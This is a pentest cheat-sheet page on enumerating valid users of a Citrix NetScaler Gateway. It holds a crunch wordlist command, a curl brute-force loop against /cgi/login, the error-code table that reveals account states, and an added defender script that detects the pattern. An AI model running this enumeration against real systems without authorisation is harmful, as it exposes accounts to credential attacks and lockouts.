User Enumeration

Citrix Netscaler Gateway

It is possible to enumerate internal users by brute-forcing the username on the Citrix Netscaler Gateway web interface.

Generate a wordlist of possible users

Use a tool to generate a wordlist of all possible usernames based on the company's naming schema. A simple example I ran into in a real engagement was the first letter of the first name followed by the first letter of the last name (e.g. sb).

crunch 2 2 abcdefghijklmnopqrstuvwxyz -o users.txt

Enumerate valid users

Once you have a proper wordlist, enumerate valid users with the following bash one-liner:

for u in $(cat <USERLIST>); do curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=$u" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR=4001" >/dev/null && echo "[+] Found valid user: $u"; done | tee <VALID USERS OUTPUT FILE>

Warning

Be careful not to lock users out! Each request is an authentication attempt with wrong credentials.
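From the defender's side, the loop above leaves a recognisable trace: one source submitting many different login names, one attempt each, in a short period. The following is an added example (not part of the original page) that flags this pattern; the record format, sample data and thresholds are assumptions and do not reflect a real NetScaler log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def constructed_sample():
    """Constructed records in a hypothetical format: time, source, login, NSC_VPNERR."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    rec = lambda sec, src, user: f"{(t0 + timedelta(seconds=sec)).isoformat()} {src} {user} 4001"
    lines = []
    # One source walking a two-letter wordlist, a single attempt per name.
    names = [a + b for a in "abc" for b in "abcd"]
    lines += [rec(2 * i, "203.0.113.7", n) for i, n in enumerate(names)]
    # One person mistyping their own password three times.
    lines += [rec(30 * i, "198.51.100.20", "jdoe") for i in range(3)]
    # A shared office address: four different people each failing once.
    lines += [rec(60 * i, "192.0.2.44", u) for i, u in enumerate(["am", "kt", "rs", "lv"])]
    return lines

def find_enumeration(lines, window=timedelta(minutes=5), min_users=10):
    """Return sources whose peak count of distinct failed login names
    inside one time window reaches min_users."""
    per_src = defaultdict(list)
    for line in lines:
        ts, src, user, code = line.split()
        # Assumption: any code in the page's 4001-4019 range is a failed logon.
        if 4001 <= int(code) <= 4019:
            per_src[src].append((datetime.fromisoformat(ts), user))
    flagged = {}
    for src, events in per_src.items():
        events.sort()
        start = best = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({u for _, u in events[start:end + 1]}))
        if best >= min_users:
            flagged[src] = best
    return flagged

if __name__ == "__main__":
    for src, count in find_enumeration(constructed_sample()).items():
        print(f"possible username enumeration from {src}: {count} distinct logins")
```

Counting distinct login names per source, rather than total failures, keeps a single user retrying their own password from being flagged.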

Other response status codes

The NSC_VPNERR code in the response reveals additional information about a given user:

curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=<USERNAME>" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR"

All response status codes can be found in the following XML file: https://<HOSTNAME>/logon/themes/Default/resources/en.xml

<String id="errorMessageLabel4001">Incorrect user name or password.</String>
<String id="errorMessageLabel4002">You do not have permission to log on.</String>
<String id="errorMessageLabel4003">Cannot connect to server. Try connecting again in a few minutes.</String>
<String id="errorMessageLabel4004">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4005">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4006">Incorrect user name.  </String>
<String id="errorMessageLabel4007">Incorrect password.</String>
<String id="errorMessageLabel4008">Passwords do not match.</String>
<String id="errorMessageLabel4009">User not found.</String>
<String id="errorMessageLabel4010">You do not have permission to log on at this time.</String>
<String id="errorMessageLabel4011">Your account is disabled.</String>
<String id="errorMessageLabel4012">Your password has expired.</String>
<String id="errorMessageLabel4013">You do not have permission to log on.</String>
<String id="errorMessageLabel4014">Could not change your password.</String>
<String id="errorMessageLabel4015">Your account is temporarily locked.  </String>
<String id="errorMessageLabel4016">Could not update your password. The password must meet the length, complexity, and history requirements of the domain.</String>
<String id="errorMessageLabel4017">Unable to process your request.</String>
<String id="errorMessageLabel4018">Your device failed to meet compliance requirements. Please check with your administrator.</String>
<String id="errorMessageLabel4019">Your device is not managed. Please check with your administrator.</String>
<String id="errorMessageLabelMax">4019</String>

Warning

Be careful not to lock users out! Each request is an authentication attempt with wrong credentials.